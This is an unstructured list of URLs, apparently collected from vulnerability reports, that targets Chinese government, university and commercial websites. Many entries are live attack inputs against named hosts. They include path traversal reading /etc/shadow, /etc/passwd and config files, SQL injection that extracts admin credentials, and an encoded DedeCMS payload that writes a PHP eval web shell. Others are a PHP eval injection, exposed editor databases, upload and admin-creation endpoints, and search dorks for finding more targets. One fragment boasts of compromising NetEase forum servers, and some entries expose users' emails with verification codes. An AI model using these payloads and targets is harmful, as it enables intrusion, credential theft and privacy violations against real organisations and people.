http://124.166.243.132:8080/week/open/bid/cms_open_bid.jspx?id=460 http://www.mdqggzyjy.com/week/open/bid/cms_open_bid.jspx?id=765牡丹区公共资源交易网 http://60.214.152.90:8080/news/trade/all/index.jspx?code=notice_dyproject枣庄市公共资源交易网 http://60.214.152.90:8080/news/integrity/all/index.jspx?code=cms_integrity_ryb http://60.214.152.90:8080/news/law/all/index.jspx?code=cms_law_jsgc http://60.214.152.90:8080/news/introduce/all/index.jspx?code=cms_introduce_jgzn http://www.ggzyjy.changzhi.gov.cn/news/news/page/index.jspx?code=cms_news_xwzx http://www.ggzyjy.changzhi.gov.cn/news/notice/page/index.jspx?code=cms_news_xwzx http://www.ggzyjy.changzhi.gov.cn/news/jsgc/page/index.jspx?code=biddingNotice_dyproject http://www.ggzyjy.changzhi.gov.cn/news/jsgc/page/index_2.jspx?code=biddingNotice_dyproject http://www.ggzyjy.changzhi.gov.cn/news/trade/page/index_2.jspx?code=biddingNotice_dyproject http://www.dzzwfw.com/news/news/page/index.jspx?code=CMS_PUBLIC_RSGL德州市公共资源网 http://www.dzzwfw.com/news/trade/page/index.jspx?code=biddingNotice_dyproject http://www.dzzwfw.com/news/trade/page/index_2.jspx?code=biddingNotice_dyproject http://www.dzzwfw.com/news/notice/page/index_2.jspx?code=cms_public_rsgl http://ggzy.jzcfxxw.gov.cn:8080/news/news/page/index.jspx?code=cms_news_xwzx晋中市公共资源交易网 http://ggzy.jzcfxxw.gov.cn:8080/news/jsgc/page/index.jspx?code=biddingNotice_dyproject http://ggzy.jzcfxxw.gov.cn:8080/news/notice/page/index.jspx?code=cms_news_xwzx http://ggzy.jzcfxxw.gov.cn:8080/news/news/page/index_2.jspx?code=cms_news_xwzx http://ggzy.jzcfxxw.gov.cn:8080/news/trade/page/index_2.jspx?code=biddingNotice_dyproject http://ggzy.jzcfxxw.gov.cn:8080/news/cqjy/page/index_2.jspx?code=biddingNotice_propertyRight http://ggzy.jzcfxxw.gov.cn:8080/news/notice/page/index_2.jspx?code=cms_news_xwzx http://60.214.152.90:8080/枣庄市公共资源交易网(MSSQL数据库) http://www.xzggzyjy.gov.cn/忻州市公共资源交易网 http://cczfbz.changchun.gov.cn为例 http://cczfbz.changchun.gov.cn/modalList.jsp?bid=231&page=1 http://cczfbz.changchun.gov.cn/modal.jsp?aid=13238 http://cczfbz.changchun.gov.cn/modalSubList.jsp?bid=221&subid=298 http://cczfbz.changchun.gov.cn/znss.jsp http://xsc.bnu.edu.cn/xsc1/show.php?item_id=2522&accessory=-20140429113504%20union%20select%201,2,concat http://www.tc12345.gov.cn/Company.aspx?type=1 http://bbs.tompda.com/data.rar http://bbs.tompda.com/1.txt http://rs.hntelecom.net.cn/HRSystem/initIndex.do http://rs.hntelecom.net.cn/loginadmin.do?m=login rs.hntelecom.net.cn/filedown.do?m=filedown&path=/../..//../..//../..//../..//../..//etc/shadow%00 rs.hntelecom.net.cn/search.do?m=search rs.hntelecom.net.cn/searchD.do?m=searchD http://jky.ynnu.edu.cn/articleview.aspx?id=262 http://jky.ynnu.edu.cn/login.aspx http://www.loveindds.com/asp/login.asp http://www.loveindds.com/asp/openmmx.asp?itype=8&iid=2250 http://221.231.143.3/ http://wsxf.ahxfj.gov.cn/ http://www.nmgxfj.gov.cn/ http://xzxx.fsxzf.gov.cn/ http://wsxf.my.gov.cn/ http://wsxf.lepingshi.gov.cn/ http://wsxf.zqxf.gov.cn/ http://www.dzxfj.gov.cn/ http://xinfang.nanning.gov.cn/ http://218.94.25.233:81/ http://wfsxfj.weifang.gov.cn/ http://www.lyxfj.gov.cn/ http://www.jkq.lyxfj.gov.cn/ http://oa.lzwebs.com/ http://125.64.4.176/ http://www.lcxfj.gov.cn/ http://xf.lwsxfj.cn/ http://www.hzsxfj.gov.cn/ http://221.231.143.3/getpwd.asp?DepartNo=001000000000&UserName= http://wsxf.ahxfj.gov.cn/email_index.asp?DepartNo=001000000 http://wsxf.ahxfj.gov.cn/include/exit.asp?DepartNo=001000000 http://wsxf.ahxfj.gov.cn/include/save_myd.asp?DepartNo=001000000 http://www.nmgxfj.gov.cn/qdshow.asp?Qid=1 http://xzxx.fsxzf.gov.cn/view_mail.aspx?regist_no=201403000006 http://wsxf.lepingshi.gov.cn/email_index.asp?DepartNo=001000000 http://wsxf.lepingshi.gov.cn/include/exit.asp?DepartNo=001000000 http://wsxf.zqxf.gov.cn/view_mail.aspx?regist_no=201303000067&zt=1 http://xinfang.nanning.gov.cn/getpwd.asp?DepartNo=001000000000&UserName= http://www.cregc.com.cn/news/2.asp http://www.facrs.com/dama.asp http://www.crec.com.cn/read.asp?id=1633 http://szupu.szu.edu.cn/szupu/main/main.php http://gswx.gov.cn/xinfang/ http://www.gswx.gov.cn/gswx.zip http://tiku.huatu.com/index.php?act=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://kf.runich.com/index.php/Bug/getzones http://www.qkl.cn/admin.jsp http://px.jlnetplc.gov.cn/Files/Image/t1.jpg http://px.jlnetplc.gov.cn/editor/ http://www.lbbook.cn/page.php?id=3 http://www.guomobile.com/news.php http://www.guomobile.com/news.php http://218.15.233.131/website/approve/approveSiteAction!logout.action http://zqas.gov.cn/website/approve/approveSiteAction!logout.action http://121.10.254.140/website/approve/approveSiteAction!logout.action http://61.146.213.170/website/approve/approveSiteAction!logout.action google:inurl:approveSiteAction!logout.action http://sports.lixin.edu.cn/list.aspx?id=3 http://sports.lixin.edu.cn/admin/login.aspx http://sports.lixin.edu.cn/editorAssembly/editor/filemanager/browser/default/connectors/test.html http://jx.10086.cn/xxt/activity/ulworks.action http://www.hzdgxx.org/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://hzchzx.cn/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://www.hzbjzg.org/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://hzgxsy.net/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://www.hzbwxx.com/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://61.175.193.70:99/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://yuweishiny.13.dns222.net/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://61.175.193.70:99/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://www.hzxxsy.com/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://tts.ytoxl.com/manager/html/ http://ktgl.ncedu.gov.cn/admin/Login.aspx后台登陆URI http://www.hcsfda.gov.cn/home/news.php?action=look&classid=3&id=151 http://www.wqsfda.gov.cn/home/news.php?action=look&classid=0&id=283 http://www.dhsfda.com/home/news.php?action=look&classid=3&id=443 http://www.sms.com.cn/news_more.php?cid=12 http://www.jingmen.gov.cn/app/wssq/ldxx.php?dw=11 site:3g.renren.com site:z.qq.com site:weibo.cn m.sm.cn/s?q=“要搜索的内容” http://xueyou.52edu.org/Index.aspx http://ks.ahjzs.net/Index.aspx http://exam2.timber2005.com/Index.aspx http://exam.iflysse.com/Login.aspx http://124.128.220.140:6006/Login.aspx http://116.228.52.53/login.aspx http://61.175.232.3/default.aspx http://58.221.172.30:9898/Default.aspx http://localhost/index.php/user/edit/web_save http://appjson.suning.com/advertise.php?page=1&limit=2&sys=android&class=102 https://cloud.suning.com/cloud-api/login/logon?mobileClientVersion=2.1.8&data=6D2599ED208426E6130B074E0F79B20F8CF372D8B8E0B52FCC967EBEAAAD284AB18F74EA231FB30452D8B2479B792EF6D5B9F0B25418C0A94B5C5414F86472FA16A1637AF794AD941B78BFF44066B780&uid=186********&logonType=2&mobileSystemVersion=4.2.1&mobilePattern=M353& http://tool.28xl.com/life/jiufang/?q={${phpinfo%28%29 http://tool.28xl.com/life/jiufang/?q={${eval%28$_POST[c]%29 http://223.203.195.159/Px_plan1.aspx?infoid=32 http://223.203.195.159/News_1.aspx?newsid=33 http://223.203.195.159/Course_Info_M.aspx?typeid=68 http://eduadmin.open.com.cn/BasicSystem/Teaching/TplanOwnerShipDetail.aspx?TplanOwnerShipID=142&RecruitBatchID=4706&LevelID=2&SpecialityID=373&universitycode=10335&UniversityName=%E6%B5%99%E6%B1%9F%E5%A4%A7%E5%AD%A6%E5%BC%80%E8%AF%BE%E8%AE%A1%E5%88%92 http://hsypjg.net/index.action http://hsypjg.net/bak.jsp http://www.cw.buct.edu.cn/ReadNews.asp?NewsID=690&BigClassName=%B2%C6%CE%F1%D0%C2%CE%C5&SmallClassName=%B9%AB%B7%D1%D2%BD%C1%C6&SpecialID=22 http://www.lawnewscn.com/ http://www.lawnewscn.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://www.lawnewscn.com/dede/login.php http://www.lawnewscn.com//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=50&arrs2[]=54&arrs2[]=49&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=113&arrs2[]=102&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=99&arrs2[]=109&arrs2[]=100&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://www.ncsshk.com/meishiShow.asp?id=64 http://www.ncsshk.com/manage/ewebeditor/db/ewebeditor.mdb http://demo.zoomla.cn/user/ http://demo.zoomla.cn/Admin/Site/Default.aspx http://www.99danji.com/99danji.rar http://www.cqupt.edu.cn/kxyj/jg.php?id=108 http://che.zju.edu.cn/tpe973/topic_detail.php?id=266 http://www.nanchangjk.jcy.gov.cn/ http://www.cqksy.cn http://www.cqksy.cn/oa/common/getFile.jsp?realpath=/../../../../../etc/passwd http://channel.wacom.com.cn/checkaccount.asp?username=admin http://comment.yaolan.com/zhuanti/MessageBoard.aspx?Topic=jdx&Color=#008BDC 1.fo/product.jsp?searchField= 2.fo/service.jsp?download=true&fileName= http://www.zkchina.com.cn/ http://www.sz-hws.com/ http://www.dbslz.com/ http://www.tinsbowatch.com/ http://www.dzydz.com/ http://www.szjscctv.cn/ http://www.chinatapes.com/ http://www.sztcxf119.com/ http://www.sztoxda.com/ http://www.baiji-tech.com/ http://www.hyfuan.com/ http://www.360ddz.cn/ http://www.timesmatch.com/ http://www.autic.cn/ http://www.huazengkeji.com/ http://www.mkzhan.com/1822/ http://www.mkzhan.com/index.php/tbmall/index http://etrip.wangqi.com/这是网奇屌丝官网的旅游 http://cal.189.cn/user/login.action http://localhost/thinksaas/index.php?app=group&ac=create&ts=do http://demo.zoomla.cn/Guest/Baike/Details.aspx?soure=manager&tittle=1 http://eduadmin.open.com.cn http://59.33.44.119:81/boai_mybjbm/userfiles/ http://survey.wacom.com.cn/AdminPages/Login.aspx http://qq.ycddm.cn/qq/ http://huixin.zymk.cn/admin.php http://huixin.zymk.cn/Public/upload.php?path=upload/img&inputid=pic http://www.mkzhan.com/index.php/cindex/index https://mapi.alipay.com/gateway.do?_input_charset=utf-8¬ify_url=http%3A%2F%2Fpay.zymk.cn%2Fpaycenter%2Falipay%2Fnotify_url.php&out_trade_no=vip_0511235007_5094751&partner=2088201607928636&payment_type=1&paymethod=directPay&seller_email=mkcomic%40qq.com&service=create_direct_pay_by_user&subject=%E5%85%85%E5%80%BC%E6%BC%AB%E5%AE%A2%E6%A0%88%E5%8C%85%E6%9C%88vip&total_fee=100&sign=c343ef7c329034184b2c880969eae1d0&sign_type=MD5 http://www.bzldbz.gov.cn/ http://116.228.70.126 www2.91bcbang.com的网站,一个博彩导航网站,该导航网站有几十个博彩公司的广告。搜索162.212.180.231这个IP,得到这个IP的历史记录 http://xiao.zymk.cn/ http://xiao.zymk.cn/180789 http://zhichang.renren.com/company/5860961/positions http://zhichang.renren.com/home/resume http://zhichang.renren.com/follow?uid=8629369&_rtk=5393bf59 http://zhichang.renren.com/company/6899681?url_stat_type=search_company?url_stat_type=index_company http://zhichang.renren.com/follow?uid=6899681&_rtk=5393bf59 http://ecard.xidian.edu.cn/fabu/cardUserManager.do?method=thirdLogin&certNo= http://xjyjy.zqu.edu.cn/ http://221.179.43.190/x.asp http://ccidstudy.ccidnet.com/?mod=Bookshow&id=72 http://202.38.232.84/eresources/edetail.php?id=18 site:http://202.38.232.84/ inurl:login找出后台登陆网址 http://www.wzae.gov.cn/was/portals/main/news.jsp?unid=20131220-6156C1AFD8389AA8CC23-11 http://vip.book.sohu.com/user/data/bookshelf_data_mobile.php?f=1 http://sns.maimaicha.com/company/hebei?category=heicha_zcs http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/web.xml http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini http://www.yzwh.gov.cn/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini http://111.175.243.111:8080/sig/ http://210.76.65.156/sofpro/sof_inneruser_login.jsp http://www.baiyunshan.com.cn/sofpro/otherproject/dcwj/dcwj.jsp?id=6 http://www.riyu365.com/ http://www.jsgygs.gov.cn:8000/login.action http://szjllc.hefei.gov.cn/admin/Login.asp http://zjjw.fimmu.com/bbs/boke/Edit_Plus/FCKeditor/editor/dialog/fck_select.html http://zjjw.fimmu.com/bbs/login.asp账号登陆 http://zjjw.fimmu.com/bbs/boke/Data/Dvboke.mdb http://202.195.176.29/gmis/login.aspx http://202.195.176.29/gmis/xjgl/student_info1.aspx?studentid=20112101&Action=view http://202.195.176.29/gmis/xjgl/student_info1.aspx?studentid=20102101&Action=view http://202.195.176.29/gmis/xjgl/student_info1.aspx?studentid=20122101&Action=view http://202.195.176.29/gmis/xjgl/student_info1.aspx?studentid=20122102&Action=view http://202.195.176.29/gmis/xjgl/student_info1.aspx?studentid=20122103&Action=view http://www.whxzjx.gov.cn/ http://61.153.10.88:8080/voip/ippbx/adminindex.jsp http://127.0.0.1/data/%23data.asp http://127.0.0.1/data/%23aspcms252.asp http://hzgxgh.hhtz.gov.cn/Admin/login.aspx http://68cn.dooland.com/brand_all.php?pid=1 http://68cn.dooland.com//subscription_all.php?sortid=1 http://202.205.10.73/softwarer/course/course.asp?Code=00017 http://210.74.129.75/RegisterNewAccount.aspx Url:http://210.74.129.75//UserControls/AppendixEditor/Image.aspx?id=559576fd-bc63-41a0-a3ca-147a68a43475 http://zhuokearts.com/ http://home.xdf.cn http://asp.19e.cn/homepage.action http://www.shouliwang.com/travel http://member.9978.cn/favorite/del_info/id/1404 http://member.9978.cn/favorite/del_info/id/1404 http://985ap.xjtu.edu.cn/viewlist.php?id=traindetail&pid=2 http://985ap.xjtu.edu.cn/viewlist.php?id=traindetail&pid=2 http://985ap.xjtu.edu.cn/viewdetail.php?id=632 http://cms.neotv.cn/ http://www.neotv.cn/ http://wooyun.org/bugs/wooyun-2013-044084进行getshell操作 https://api.weibo.com/oauth2/authorize?client_id=2892344974&redirect_uri=http%3A%2F%2Fwww.mafengwo.cn%2Fconnect_sync%2Fsina_v2_sync.php&response_type=code http://www.mafengwo.cn/connect_sync/sina_v2_sync.php?code=6e20eb6bfea2d969a8fa5435a5d106d5 http://sylar.co/ encap:Ethernet B8:CA:3A:EB:C0:5A addr:211.100.37.152 Bcast:211.100.37.255 Mask:255.255.255.0 MTU:1500 packets:290695541 dropped:22171512 packets:130743076 txqueuelen:1000 http://www.gaohang.gov.cn/的站内搜索处 http://www.gaohang.gov.cn/index.php?id=1174 http://dbshare.cintcm.com/zhongyaojichu/left2.asp?init=0 http://dbmanager.cintcm.ac.cn/co/account/login.action http://www.infojiading.cn/index.asp http://210.***.***.46/conformID.asp?Tid=123%27 http://jiuye.***.edu.cn/conformID.asp?Tid=123%27 http://jytd.***.edu.cn/job/conformID.asp?Tid=123 http://job.tuniu.com/society/jobInfo/getJobInfoById?id=239 http://yb.cuit.edu.cn/editor/db/ewebeditor.mdb https://openapi.baidu.com/oauth/2.0/authorize?response_type=code&client_id=sSjGGXfnrH06sF7TbOVOuVRV&redirect_uri=http://open.baihe.com/connector/t/baiduInternalBindCallBack.action http://open.baihe.com/connector/t/baiduInternalBindCallBack.action?code=ae3197a3a5b36e219c5362f763aeaf39 http://www.998.com/ServiceComment/NewsCommentDetail.aspx?Act=GetNewsComment&CurrentPageSize=10&PageSize=10&CurrentPage=1&NewsID=7701 http://nbsw.yundasys.com:11324/ztb/register.php http://shixin.court.gov.cn/于是来到这个查询页面 http://www.zju-jsemba.com/newsread.asp?id=230 http://www.sisins.zju.edu.cn/sh/newsshow.asp?id=914 http://www.cec.zju.edu.cn/reod/english/xzfc_show.asp?id=7004 http://www.cfpg-zju.com/news.asp?id=352 http://www.ceu.zju.edu.cn/itpeceu/itpe_cn/allxx_news.asp?ID=410 http://www.reod.zju.edu.cn/xzfc_show.asp?id=7020 http://jpck.zju.edu.cn/seeco/news.asp?id=318 http://ipe.zju.edu.cn/about.asp?id=133 http://www.zjusz.com/article.asp?id=116 http://www.zhjzg.com/news.asp?newsid=290 http://www.zhjzg.com/ship.asp?id=1 http://800019376.114.qq.com/ndetail_867.html pxcz.gov.cn/page/ http://ketang.weibo.com/ http://mail.yto.net.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 index.php/script/help_proxy android:label="@7F05003C android:name="com.qvod.kuaiwan.kwbrowser.DownloadListActivity android:launchMode="3 android:screenOrientation="5 android:name="com.qvod.kuaiwan.kwbrowser.DownloadListActivity http://www.game69.cn:888/tools/filesupload.aspx http://www.ga163.com/qyry.asp?CoolSiteClassID=40 http://www.gakfq.gov.cn/admin/upload_pic.asp?formname=myform&editname=C_SitePicS&uppath=../admin&filelx=jpg http://www.hyszx.gov.cn/admin/upload_pic.asp?formname=myform&editname=C_SitePicS&uppath=../admin&filelx=jpg http://www.ga163.com/admin/upload_pic.asp?formname=myform&editname=C_SitePicS&uppath=../admin&filelx=jpg http://www.sdau.edu.cn/yjs/v2.0/lanmu.php?lid=27 http://hfzx.yxnu.net/lanmu.php?lid=15 http://www.jump-sys.com/lanmu.php?lid=50 http://hq.sspu.edu.cn/userInit.action http://localhost/thinksaas/index.php?app=system&ac=sql&ts=delete&sql=../../CHANGELOG.TXT http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add http://10.65.203.100:90/admin_aspcms/_style/AspCms_TemplateAdd.asp?acttype=html&action=add http://10.65.203.100:90//Templates/cn2014/html/111111.asp;111111.html http://www1.openedu.com.cn/file_post/display/read.php?FileID=28264 http://www.daysunlogistics.com.cn/data/myflynt/download.php?filename=../../../data/myflynt/download.php http://office.sz.focus.cn/rentsale/rentsale_view.php?rent_id=583531 inurl:rent_id http://www.kaixin001.com/reg/reg_verify.php?verifycode=354619639711&email=yangxin1012%40126.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=786245668830&email=liyizhou389%40sohu.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=265774717699&email=123456789chengnuo%40163.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=200449361669&email=tuofu410%40sina.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=418260550882&email=1013930348%40qq.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=825294304236&email=abc005.blogger%40blogger.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=326673318916&email=wpr72123%40sohu.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=844649902763&email=yeyanhaoyou%40163.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=785733632577&email=zhongshaoxi%40qq.com http://www.kaixin001.com/reg/reg_verify.php?verifycode=886374179665&email=gicy1988%40eyou.com http://220.181.74.176:8080/ http://220.181.74.176:8080/message.jsp tel:10010 http://133.52.**.*/tel.htm tel:telnumer之前都会提示用户是否拨打或者只跳转到拨号页面。 http://123.7.53.81:7001/console http://www.lytlgjj.com/gjj/ http://www.edongeejiao.cn/,直接上传下载任意内容 http://www.infojiading.cn) http://job.shvtc.com:85/EntInfoget.asp?UENo=12 http://10.65.10.235/6kbbs/member.php?action=details jsp:useBean http://www.rxczj.gov.cn/news/news.php?id=4364&cid=23 http://dyb.zjitc.net/index.php?m=Index&a=category&id=6 http://lxj.ecare365.com/HelpDetail.php?id=60000138 www.4007001717.com.cn http://grsmis.sjzu.edu.cn/public/tutorshow.aspx?ID=00147&spec=6 http://202.118.83.94:85/public/tutorshow.aspx?ID=19851006&spec=59 http://202.199.155.6/dlugdmis/public/tutorshow.aspx?ID=040040&spec=6 http://service.yonyou.com/AppWeb/FuWuCP/FuWuCP_list.aspx?BianHao=AUTON060628000002 http://servicehome.yonyou.com/ http://servicehome.yonyou.com/kmview.aspx?postid=16584 http://xsst.sinaapp.com/Xss.swf http://mall.play.yy.com/shell/.svn/entries http://fujin.gov.cn/ http://zk.hfut.edu.cn/admin/show.php?id=511 http://gfzby.hfut.edu.cn/show.php?id=335 http://www.yclynk.gov.cn/scenic_show.asp?id=11存在SQL盲注漏洞 http://www.yclynk.gov.cn/lynkadmin/ http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml http://202.108.154.209/datacenter/# http://localhost/easytalk/?m=friends&a=addfollow&user_id=11&rand=2105 http://www.smartoa.com.cn/ http://www.ccblxn.com/file/EmailDownload.ashx?url=~/web.config&name=web.config http://vip.hn118114.cn/localLifeXq.aspx?Id=5 http://vip.hn118114.cn/localLifeXq.aspx?Id=5 http://www.sqlmap.org Url:http://taokebao.v5shop.com.cn/cart.aspx?act=spikebuy&spikeid=3 inurl:productpic.aspx,因为cart.aspx是需要登录才可以正常访问,但是注入的时候毫无影响。 http://shop.optoma.com.cn/cart.aspx?act=spikebuy&spikeid=3 http://www.eglip.com/cart.aspx?act=spikebuy&spikeid=3 http://ilikeulike.cn/cart.aspx?act=spikebuy&spikeid=3 http://www.hjqtc.com/cart.aspx?act=spikebuy&spikeid=3 http://www.cs929.com/cart.aspx?act=spikebuy&spikeid=3 http://www.xiaokang.com/cart.aspx?act=spikebuy&spikeid=3 http://www.yinbaojie.com/cart.aspx?act=spikebuy&spikeid=3 http://www.wolifu.com/cart.aspx?act=spikebuy&spikeid=3 http://www.echinasport.com/cart.aspx?act=spikebuy&spikeid=3 http://www.biz-nbculture.com/cart.aspx?act=spikebuy&spikeid=3 http://haowan.lenovo.com/uc_server/ http://haowan.lenovo.com http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews&os=android_19&screen=720x1206&publishid=2011&zip=1,受影响参数:proid http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews https://sec.xiaomi.com/#/issue/416 http://www.kkeye.com/bbacad/downerro.aspx?p=2&jkname=&jkurl= http://www.kkeye.com/bbacad/downerro.aspx?jkname=&jkurl= http://sqlmap.org http://appblog.cxt8.com/agagakj/Comment/CommentAdd?parentid=0&pindex=1&content=123456&commenttype=101&is_desc=true&keyid=1&callback=jQuery16208815743161222577_1400028543820&_=1400028988970 http://appblog.cxt8.com/agagakj/Comment/CommentAdd?parentid=…ack=jQuery16208815743161222577_1400028543820&_=1400028988970 http://appblog.cxt8.com/agagakj/Comment/CommentAdd?parentid=…ack=jQuery16208815743161222577_1400028543820&_=1400028988970 http://ttt.nie.netease.com/convert/论坛转换工具存在漏洞,所以拿下了此站的shell,虽然被你们发现,删了shell,但是之前就dump了http://dc.nie.netease.com的管理员帐号,进后台,又把http://dc.nie.netease.com拿下,通过获取的管理帐号,发现他还是好几个网易论坛的管理员,接着去http://sdk.itown.netease.com登录,拿下了此站,发现此服务器上有许多网易游戏论坛,全部搞定。 http://cc.netease.com http://jl.netease.com http://mgame.netease.com http://popogame.netease.com http://wh.netease.com http://xy3.netease.com http://y3.netease.com http://zd.netease.com http://zh.netease.com http://xyq.netease.com http://cose-sz.seu.edu.cn/ http://new.fjite.gov.cn:8888/help/index.php?id=34 http://new.fjite.gov.cn:8888/help/index.php?id=34 http://www.sqlmap.org https://124.119.22.83:8080/ http://oa.bamatea.com http://oa.moonbasa.com http://oa.etonetech.com http://oa.ztcz.cn http://218.249.130.74 http://119.146.190.170:9988 http://zhidao.baidu.com http://wenku.baidu.com http://223.4.22.36 http://222.243.160.83:9090 http://www.chipshow.cn http://116.205.96.170:9090 http://www.sxjbjt.com:9090 http://122.225.203.168:8888 http://oa.chinabed.com http://oa.lutongnet.com http://oa.zetacn.com:9090 http://oa.zhcpt.edu.cn http://www.doc88.com http://oa.sinodata.com.cn http://www.docin.com http://www.koyochem.com:8080 http://61.186.155.27 http://oa.nyinn.cn http://115.236.65.115:9090 http://119.146.190.118:8089 http://219.137.250.133 http://123.133.29.174:9090 http://koa.ecp888.com http://www.cting.com.cn http://oa.suncorps.cn http://59.41.47.211 http://oa.bamatea.com:9090 http://oa.zhenaiws.com http://www.koyochem.com:9191 http://60.208.131.46:9090 http://219.131.221.174:9090 http://oa.bnuz.edu.cn:8080 http://183.238.59.61:9090 http://218.205.208.22:9090 http://oa.xhlbdc.com http://124.193.165.174:9090 http://218.75.87.186:9090 http://oa.eva-group.com:511 http://113.106.92.16:9090 http://oa.cqmsy.com http://cting.com.cn http://220.231.158.211 http://oa.tiholding.cn http://124.172.170.141:9090 http://oa.hengdigroup.com:9090 http://www1.elkay.com.cn:9090 http://www.gzpiano.com http://oa.zaffer.cn http://oa.gdisg.com http://hdcb.cn:80/web/faq.aspx?tag=faq&ptag=khfw http://www.anzhi.com/上下载个APP,顺便帮他检查一下。 http://ttkd.21tb.com/login/login.logout.do http://oa.bamatea.com http://oa.moonbasa.com http://oa.etonetech.com http://oa.ztcz.cn http://218.249.130.74 http://119.146.190.170:9988 http://zhidao.baidu.com http://wenku.baidu.com http://223.4.22.36 http://222.243.160.83:9090 http://www.chipshow.cn http://116.205.96.170:9090 http://www.sxjbjt.com:9090 http://122.225.203.168:8888 http://oa.chinabed.com http://oa.lutongnet.com http://oa.zetacn.com:9090 http://oa.zhcpt.edu.cn http://www.doc88.com http://oa.sinodata.com.cn http://www.docin.com http://www.koyochem.com:8080 http://61.186.155.27 http://oa.nyinn.cn http://115.236.65.115:9090 http://119.146.190.118:8089 http://219.137.250.133 http://123.133.29.174:9090 http://koa.ecp888.com http://www.cting.com.cn http://oa.suncorps.cn http://59.41.47.211 http://oa.bamatea.com:9090 http://oa.zhenaiws.com http://www.koyochem.com:9191 http://60.208.131.46:9090 http://219.131.221.174:9090 http://oa.bnuz.edu.cn:8080 http://183.238.59.61:9090 http://218.205.208.22:9090 http://oa.xhlbdc.com http://124.193.165.174:9090 http://218.75.87.186:9090 http://oa.eva-group.com:511 http://113.106.92.16:9090 http://oa.cqmsy.com http://cting.com.cn http://220.231.158.211 http://oa.tiholding.cn http://124.172.170.141:9090 http://oa.hengdigroup.com:9090 http://www1.elkay.com.cn:9090 http://www.gzpiano.com http://oa.zaffer.cn http://oa.gdisg.com http://www.ardjse.com/news_view.asp?news_id=132 http://218.66.59.52:8080/showfilepage.do?ID=26 